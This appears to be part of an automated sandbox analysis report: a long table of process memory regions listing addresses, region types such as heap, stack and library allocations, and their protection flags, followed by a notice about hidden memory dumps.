|
heap
|
page read and write
|
||
1CC3D9EE000
|
heap
|
page read and write
|
||
1CC3D9F5000
|
heap
|
page read and write
|
||
468C13F000
|
stack
|
page read and write
|
||
1CC3D99D000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3D9E2000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1CC3D8C5000
|
heap
|
page read and write
|
||
1CC3BB6D000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
1CC3D892000
|
heap
|
page read and write
|
||
1CC3BAFE000
|
heap
|
page read and write
|
||
1CC3D898000
|
heap
|
page read and write
|
||
224CED57000
|
trusted library allocation
|
page read and write
|
||
1CC3BB8B000
|
heap
|
page read and write
|
||
1CC3D985000
|
heap
|
page read and write
|
||
1CC3D948000
|
heap
|
page read and write
|
||
1CC3DA70000
|
heap
|
page read and write
|
||
1CC3BB6A000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
224E57A0000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3D98F000
|
heap
|
page read and write
|
||
1CC3D9A8000
|
heap
|
page read and write
|
||
1CC3DA81000
|
heap
|
page read and write
|
||
1CC3D9AE000
|
heap
|
page read and write
|
||
1CC3D9AE000
|
heap
|
page read and write
|
||
1CC3D95D000
|
heap
|
page read and write
|
||
1CC3D9B3000
|
heap
|
page read and write
|
||
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
1CC3D9AA000
|
heap
|
page read and write
|
||
1CC3D8E6000
|
heap
|
page read and write
|
||
1796EC07000
|
heap
|
page execute and read and write
|
||
1CC3D9A3000
|
heap
|
page read and write
|
||
1CC3BB77000
|
heap
|
page read and write
|
||
1CC3D994000
|
heap
|
page read and write
|
||
1CC3BB6F000
|
heap
|
page read and write
|
||
1CC3D941000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
1CC3D99D000
|
heap
|
page read and write
|
||
224DD96F000
|
trusted library allocation
|
page read and write
|
||
1CC3D9EA000
|
heap
|
page read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
1CC3D896000
|
heap
|
page read and write
|
||
1CC3D9BF000
|
heap
|
page read and write
|
||
1796F0F0000
|
heap
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
17966961000
|
trusted library allocation
|
page read and write
|
||
1CC3D87D000
|
heap
|
page read and write
|
||
92C2A7E000
|
stack
|
page read and write
|
||
17966970000
|
trusted library allocation
|
page read and write
|
||
1CC3BC99000
|
heap
|
page read and write
|
||
468C03B000
|
stack
|
page read and write
|
||
1CC3BB71000
|
heap
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
224E585F000
|
heap
|
page read and write
|
||
17954A5A000
|
heap
|
page read and write
|
||
1CC3D9DD000
|
heap
|
page read and write
|
||
1CC3D8C8000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
1CC3D880000
|
heap
|
page read and write
|
||
224CE2AE000
|
trusted library allocation
|
page read and write
|
||
1CC3D9EE000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
17954A0B000
|
heap
|
page read and write
|
||
1CC3D8EB000
|
heap
|
page read and write
|
||
224DD6F5000
|
trusted library allocation
|
page read and write
|
||
1CC3BB85000
|
heap
|
page read and write
|
||
1CC3DA83000
|
heap
|
page read and write
|
||
224CB7E7000
|
heap
|
page read and write
|
||
179563E0000
|
heap
|
page execute and read and write
|
||
224CD120000
|
trusted library allocation
|
page read and write
|
||
1CC3D98C000
|
heap
|
page read and write
|
||
1CC3D943000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
224E58C7000
|
heap
|
page execute and read and write
|
||
1CC3D994000
|
heap
|
page read and write
|
||
1CC3BB79000
|
heap
|
page read and write
|
||
468BBFE000
|
stack
|
page read and write
|
||
224CD5D0000
|
heap
|
page execute and read and write
|
||
1CC3D9BF000
|
heap
|
page read and write
|
||
468BAFE000
|
stack
|
page read and write
|
||
224DD838000
|
trusted library allocation
|
page read and write
|
||
224CD670000
|
heap
|
page read and write
|
||
1CC3D8A0000
|
heap
|
page read and write
|
||
1CC3D96E000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
1CC3D896000
|
heap
|
page read and write
|
||
1CC3D966000
|
heap
|
page read and write
|
||
1CC3DA96000
|
heap
|
page read and write
|
||
1CC3D973000
|
heap
|
page read and write
|
||
17954A63000
|
heap
|
page read and write
|
||
1CC3D951000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
224CF261000
|
trusted library allocation
|
page read and write
|
||
1CC3D8E3000
|
heap
|
page read and write
|
||
1CC3D9A4000
|
heap
|
page read and write
|
||
1CC3D99C000
|
heap
|
page read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3DA02000
|
heap
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
224CD8AE000
|
trusted library allocation
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3D992000
|
heap
|
page read and write
|
||
1CC3D8F0000
|
heap
|
page read and write
|
||
3889CFE000
|
stack
|
page read and write
|
||
7DF4151C0000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3DA8D000
|
heap
|
page read and write
|
||
17956925000
|
heap
|
page read and write
|
||
468BEBE000
|
stack
|
page read and write
|
||
224E58C0000
|
heap
|
page execute and read and write
|
||
468C1BF000
|
stack
|
page read and write
|
||
1CC3BB67000
|
heap
|
page read and write
|
||
1CC3D8EC000
|
heap
|
page read and write
|
||
224CD0D0000
|
heap
|
page read and write
|
||
1CC3BB6C000
|
heap
|
page read and write
|
||
1CC3D9BF000
|
heap
|
page read and write
|
||
1CC3BB71000
|
heap
|
page read and write
|
||
1CC3DA96000
|
heap
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
224DD681000
|
trusted library allocation
|
page read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3BB66000
|
heap
|
page read and write
|
||
1CC3D8EC000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3BB8B000
|
heap
|
page read and write
|
||
1CC3DAB0000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3D8EF000
|
heap
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
179549E3000
|
heap
|
page read and write
|
||
92C2DF9000
|
stack
|
page read and write
|
||
1CC3BB8C000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
224CD500000
|
trusted library allocation
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
1CC3D9FE000
|
heap
|
page read and write
|
||
1CC3D8B3000
|
heap
|
page read and write
|
||
1CC3BC95000
|
heap
|
page read and write
|
||
1CC3D8AE000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3D8EB000
|
heap
|
page read and write
|
||
1CC3D974000
|
heap
|
page read and write
|
||
1CC3D89E000
|
heap
|
page read and write
|
||
1CC3D896000
|
heap
|
page read and write
|
||
1CC3D973000
|
heap
|
page read and write
|
||
224CD18A000
|
heap
|
page read and write
|
||
92C2C7E000
|
stack
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
224E5806000
|
heap
|
page read and write
|
||
1CC3D9AF000
|
heap
|
page read and write
|
||
1CC3BAB9000
|
heap
|
page read and write
|
||
1CC3D939000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3D88A000
|
heap
|
page read and write
|
||
1CC3D8C3000
|
heap
|
page read and write
|
||
1CC3BB58000
|
heap
|
page read and write
|
||
1CC3D96C000
|
heap
|
page read and write
|
||
1CC3D8D3000
|
heap
|
page read and write
|
||
1CC3D899000
|
heap
|
page read and write
|
||
224CD180000
|
heap
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3BC9D000
|
heap
|
page read and write
|
||
1CC3D983000
|
heap
|
page read and write
|
||
1CC3D99D000
|
heap
|
page read and write
|
||
1CC3D9B1000
|
heap
|
page read and write
|
||
1795691E000
|
heap
|
page read and write
|
||
224CD503000
|
trusted library allocation
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D9B1000
|
heap
|
page read and write
|
||
3889FFE000
|
stack
|
page read and write
|
||
92C31BE000
|
stack
|
page read and write
|
||
1CC3BABF000
|
heap
|
page read and write
|
||
92C2EB6000
|
stack
|
page read and write
|
||
17956FBB000
|
trusted library allocation
|
page read and write
|
||
1CC3D985000
|
heap
|
page read and write
|
||
1CC3D9B1000
|
heap
|
page read and write
|
||
92C27F3000
|
stack
|
page read and write
|
||
224CB925000
|
heap
|
page read and write
|
||
1CC3D941000
|
heap
|
page read and write
|
||
1CC3DA84000
|
heap
|
page read and write
|
||
1CC3D997000
|
heap
|
page read and write
|
||
388A4FE000
|
stack
|
page read and write
|
||
1CC3BB78000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D943000
|
heap
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3DAA6000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1CC3D89F000
|
heap
|
page read and write
|
||
1CC3D944000
|
heap
|
page read and write
|
||
1CC3D9B1000
|
heap
|
page read and write
|
||
1CC3D8DD000
|
heap
|
page read and write
|
||
7FFD9B934000
|
trusted library allocation
|
page read and write
|
||
1CC3D9C3000
|
heap
|
page read and write
|
||
1CC3BB6F000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3BB6E000
|
heap
|
page read and write
|
||
1CC3D95D000
|
heap
|
page read and write
|
||
224CF37D000
|
trusted library allocation
|
page read and write
|
||
1CC3BB70000
|
heap
|
page read and write
|
||
1CC3D88B000
|
heap
|
page read and write
|
||
17956840000
|
heap
|
page read and write
|
||
1CC3BB58000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D9A8000
|
heap
|
page read and write
|
||
1CC3D9AE000
|
heap
|
page read and write
|
||
1CC3D892000
|
heap
|
page read and write
|
||
1CC3D889000
|
heap
|
page read and write
|
||
1CC3D8EB000
|
heap
|
page read and write
|
||
17956A7D000
|
trusted library allocation
|
page read and write
|
||
17956919000
|
heap
|
page read and write
|
||
1CC3D9E1000
|
heap
|
page read and write
|
||
179569CD000
|
trusted library allocation
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3D9A6000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
179563D0000
|
trusted library allocation
|
page read and write
|
||
1CC3D97A000
|
heap
|
page read and write
|
||
17956E6D000
|
trusted library allocation
|
page read and write
|
||
1CC3D8AE000
|
heap
|
page read and write
|
||
1CC3D9AB000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3D870000
|
heap
|
page read and write
|
||
1CC3D990000
|
heap
|
page read and write
|
||
1CC3BC9C000
|
heap
|
page read and write
|
||
17956E5E000
|
trusted library allocation
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3D8D4000
|
heap
|
page read and write
|
||
17956470000
|
trusted library allocation
|
page read and write
|
||
1CC3D9A8000
|
heap
|
page read and write
|
||
1CC3D946000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D936000
|
heap
|
page read and write
|
||
224CB84C000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
1CC3D939000
|
heap
|
page read and write
|
||
1CC3BB6C000
|
heap
|
page read and write
|
||
1CC3D939000
|
heap
|
page read and write
|
||
1CC3D96E000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D8E8000
|
heap
|
page read and write
|
||
179563B0000
|
trusted library allocation
|
page read and write
|
||
1CC3D951000
|
heap
|
page read and write
|
||
1CC3BA30000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3D9CA000
|
heap
|
page read and write
|
||
92C2E3E000
|
stack
|
page read and write
|
||
388A6FB000
|
stack
|
page read and write
|
||
1CC3D9AC000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D955000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3D957000
|
heap
|
page read and write
|
||
1CC3D994000
|
heap
|
page read and write
|
||
1CC3D936000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1CC3D997000
|
heap
|
page read and write
|
||
1CC3D8E0000
|
heap
|
page read and write
|
||
1CC3D966000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
1CC3D8AF000
|
heap
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
1CC3D9AD000
|
heap
|
page read and write
|
||
1CC3D9E9000
|
heap
|
page read and write
|
||
17956C5A000
|
trusted library allocation
|
page read and write
|
||
17956D70000
|
trusted library allocation
|
page read and write
|
||
1CC3D994000
|
heap
|
page read and write
|
||
1CC3D9A9000
|
heap
|
page read and write
|
||
1CC3D9DF000
|
heap
|
page read and write
|
||
1CC3D8C8000
|
heap
|
page read and write
|
||
224E5CF0000
|
heap
|
page read and write
|
||
1CC3D8B3000
|
heap
|
page read and write
|
||
17954A80000
|
heap
|
page read and write
|
||
1CC3D998000
|
heap
|
page read and write
|
||
17956AC1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
468BB7E000
|
stack
|
page read and write
|
||
1CC3D8C5000
|
heap
|
page read and write
|
||
1CC3DAA6000
|
heap
|
page read and write
|
||
224E57BE000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
1CC3D947000
|
heap
|
page read and write
|
||
1CC3D992000
|
heap
|
page read and write
|
||
17956E9C000
|
trusted library allocation
|
page read and write
|
||
224CED30000
|
trusted library allocation
|
page read and write
|
||
17954BD5000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
1CC3D9AB000
|
heap
|
page read and write
|
||
1CC3D8EE000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
1CC3D970000
|
heap
|
page read and write
|
||
92C2AFE000
|
stack
|
page read and write
|
||
1CC3DA90000
|
heap
|
page read and write
|
||
1CC3D9DF000
|
heap
|
page read and write
|
||
224E59D8000
|
heap
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
1CC3D998000
|
heap
|
page read and write
|
||
1CC3BB79000
|
heap
|
page read and write
|
||
1CC3D8B5000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D8F2000
|
heap
|
page read and write
|
||
1CC3BB8E000
|
heap
|
page read and write
|
||
17956A6D000
|
trusted library allocation
|
page read and write
|
||
1CC3DAB0000
|
heap
|
page read and write
|
||
1CC3D8BE000
|
heap
|
page read and write
|
||
1CC3D972000
|
heap
|
page read and write
|
||
1CC3BC9A000
|
heap
|
page read and write
|
||
17956848000
|
heap
|
page read and write
|
||
1CC3D943000
|
heap
|
page read and write
|
||
7FFD9B922000
|
trusted library allocation
|
page read and write
|
||
224CEEC4000
|
trusted library allocation
|
page read and write
|
||
1CC3D98F000
|
heap
|
page read and write
|
||
1CC3D896000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1CC3BB58000
|
heap
|
page read and write
|
||
1CC3BB83000
|
heap
|
page read and write
|
||
224CECAE000
|
trusted library allocation
|
page read and write
|
||
1CC3DAB2000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
17956A70000
|
trusted library allocation
|
page read and write
|
||
1CC3D8E6000
|
heap
|
page read and write
|
||
1CC3BC9A000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1CC3D9AC000
|
heap
|
page read and write
|
||
17956FC4000
|
trusted library allocation
|
page read and write
|
||
1CC3D9DC000
|
heap
|
page read and write
|
||
1CC3D8AE000
|
heap
|
page read and write
|
||
1CC3D9AF000
|
heap
|
page read and write
|
||
1CC3BB82000
|
heap
|
page read and write
|
||
1CC3D9A8000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
224CF4DC000
|
trusted library allocation
|
page read and write
|
||
388A0FF000
|
stack
|
page read and write
|
||
1CC3D95A000
|
heap
|
page read and write
|
||
1CC3D8B7000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
1CC3BB8C000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
1CC3D946000
|
heap
|
page read and write
|
||
1CC3BB78000
|
heap
|
page read and write
|
||
1CC3BB70000
|
heap
|
page read and write
|
||
1CC3DA81000
|
heap
|
page read and write
|
||
1CC3DAB0000
|
heap
|
page read and write
|
||
1CC3D899000
|
heap
|
page read and write
|
||
224CD130000
|
heap
|
page readonly
|
||
224CB820000
|
heap
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3BC90000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
179549C3000
|
heap
|
page read and write
|
||
1CC3D955000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
1CC3D890000
|
heap
|
page read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
1CC3D9BF000
|
heap
|
page read and write
|
||
1CC3DA0E000
|
heap
|
page read and write
|
||
1CC3D8DA000
|
heap
|
page read and write
|
||
1795697D000
|
trusted library allocation
|
page read and write
|
||
224E5790000
|
heap
|
page read and write
|
||
1CC3D87C000
|
heap
|
page read and write
|
||
179568FB000
|
heap
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
1CC3D8B2000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3D9F8000
|
heap
|
page read and write
|
||
1CC3DA0E000
|
heap
|
page read and write
|
||
17956D4C000
|
trusted library allocation
|
page read and write
|
||
1CC3DA96000
|
heap
|
page read and write
|
||
1CC3D973000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
1CC3BC9A000
|
heap
|
page read and write
|
||
468BCFF000
|
stack
|
page read and write
|
||
179549C9000
|
heap
|
page read and write
|
||
92C323B000
|
stack
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
224CED36000
|
trusted library allocation
|
page read and write
|
||
1CC3D9EE000
|
heap
|
page read and write
|
||
1CC3D8CD000
|
heap
|
page read and write
|
||
1CC3BB75000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1CC3BB75000
|
heap
|
page read and write
|
||
1CC3D985000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
1CC3D8CE000
|
heap
|
page read and write
|
||
224CB804000
|
heap
|
page read and write
|
||
1CC3DAB1000
|
heap
|
page read and write
|
||
1CC3BABE000
|
heap
|
page read and write
|
||
1CC3D9C5000
|
heap
|
page read and write
|
||
1CC3D936000
|
heap
|
page read and write
|
||
1CC3D985000
|
heap
|
page read and write
|
||
1CC3D88C000
|
heap
|
page read and write
|
||
1CC3BB6C000
|
heap
|
page read and write
|
||
1CC3D9DB000
|
heap
|
page read and write
|
||
224E57EA000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1796EB30000
|
heap
|
page execute and read and write
|
||
17956A06000
|
trusted library allocation
|
page read and write
|
||
1CC3D9A5000
|
heap
|
page read and write
|
||
1CC3D982000
|
heap
|
page read and write
|
||
1CC3D8E4000
|
heap
|
page read and write
|
||
1CC3D985000
|
heap
|
page read and write
|
||
92C2BFD000
|
stack
|
page read and write
|
||
92C2B7E000
|
stack
|
page read and write
|
||
468BDFE000
|
stack
|
page read and write
|
||
1CC3D8AE000
|
heap
|
page read and write
|
||
1CC3DA84000
|
heap
|
page read and write
|
||
1CC3D9A6000
|
heap
|
page read and write
|
||
1CC3D8F3000
|
heap
|
page read and write
|
||
1CC3D966000
|
heap
|
page read and write
|
||
1CC3BB8A000
|
heap
|
page read and write
|
||
1CC3D9F9000
|
heap
|
page read and write
|
||
1CC3BB6C000
|
heap
|
page read and write
|
||
1CC3BB85000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1CC3D983000
|
heap
|
page read and write
|
||
1CC3D8C8000
|
heap
|
page read and write
|
||
1CC3D877000
|
heap
|
page read and write
|
||
1CC3BB6A000
|
heap
|
page read and write
|
||
1CC3DA12000
|
heap
|
page read and write
|
||
179563F0000
|
heap
|
page readonly
|
||
1CC3D943000
|
heap
|
page read and write
|
||
1CC3D94F000
|
heap
|
page read and write
|
||
1CC3DAA0000
|
heap
|
page read and write
|
||
1CC3BB6D000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79C000
|
trusted library allocation
|
page read and write
|
||
1CC3D898000
|
heap
|
page read and write
|
||
17956D35000
|
trusted library allocation
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
1CC3D99F000
|
heap
|
page read and write
|
||
1CC3D8F4000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
224CF18C000
|
trusted library allocation
|
page read and write
|
||
1CC3D933000
|
heap
|
page read and write
|
||
1CC3BABF000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
1CC3D963000
|
heap
|
page read and write
|
||
1CC3D9BA000
|
heap
|
page read and write
|
||
1CC3BB78000
|
heap
|
page read and write
|
||
17956EA4000
|
trusted library allocation
|
page read and write
|
||
224E586F000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
224E59EC000
|
heap
|
page read and write
|
||
1CC3BB64000
|
heap
|
page read and write
|
||
1CC3D8B9000
|
heap
|
page read and write
|
||
224CB89D000
|
heap
|
page read and write
|
||
224E5A14000
|
heap
|
page read and write
|
||
1CC3BB6A000
|
heap
|
page read and write
|
||
1CC3D960000
|
heap
|
page read and write
|
||
1CC3D997000
|
heap
|
page read and write
|
||
17954BD0000
|
heap
|
page read and write
|
||
1CC3DA96000
|
heap
|
page read and write
|
||
92C313E000
|
stack
|
page read and write
|
||
224CB920000
|
heap
|
page read and write
|
||
1CC3D9AC000
|
heap
|
page read and write
|
||
1CC3D8BC000
|
heap
|
page read and write
|
||
1CC3D98D000
|
heap
|
page read and write
|
||
1CC3DA81000
|
heap
|
page read and write
|
||
1CC3D994000
|
heap
|
page read and write
|
||
1CC3D9D7000
|
heap
|
page read and write
|
||
1CC3BB20000
|
heap
|
page read and write
|
||
17954980000
|
heap
|
page read and write
|
||
179564F0000
|
heap
|
page read and write
|
||
179569FD000
|
trusted library allocation
|
page read and write
|
||
1CC3BB8C000
|
heap
|
page read and write
|
||
1CC3D99A000
|
heap
|
page read and write
|
||
1CC3D89B000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1CC3D9A9000
|
heap
|
page read and write
|
||
1CC3D9A0000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
1CC3D89F000
|
heap
|
page read and write
|
||
1CC3BB76000
|
heap
|
page read and write
|
||
1CC3BB84000
|
heap
|
page read and write
|
||
1CC3BB75000
|
heap
|
page read and write
|
||
1CC3D9B7000
|
heap
|
page read and write
|
||
1CC3DAA0000
|
heap
|
page read and write
|
||
1CC3BB8C000
|
heap
|
page read and write
|
||
1CC3D8B5000
|
heap
|
page read and write
|
||
1CC3D9AC000
|
heap
|
page read and write
|
||
1CC3D971000
|
heap
|
page read and write
|
||
1CC3D9B8000
|
heap
|
page read and write
|
||
1CC3D99A000
|
heap
|
page read and write
|
||
1CC3D952000
|
heap
|
page read and write
|
||
224CB7C0000
|
heap
|
page read and write
|
||
1CC3D9BC000
|
heap
|
page read and write
|
||
1CC3D89E000
|
heap
|
page read and write
|
||
1CC3D883000
|
heap
|
page read and write
|
||
1CC3BB7A000
|
heap
|
page read and write
|
||
468C0BE000
|
stack
|
page read and write
|
||
1CC3D8EC000
|
heap
|
page read and write
|
||
1CC3D8C4000
|
heap
|
page read and write
|
||
1CC3D955000
|
heap
|
page read and write
|
There are 822 hidden memdumps, click here to show them.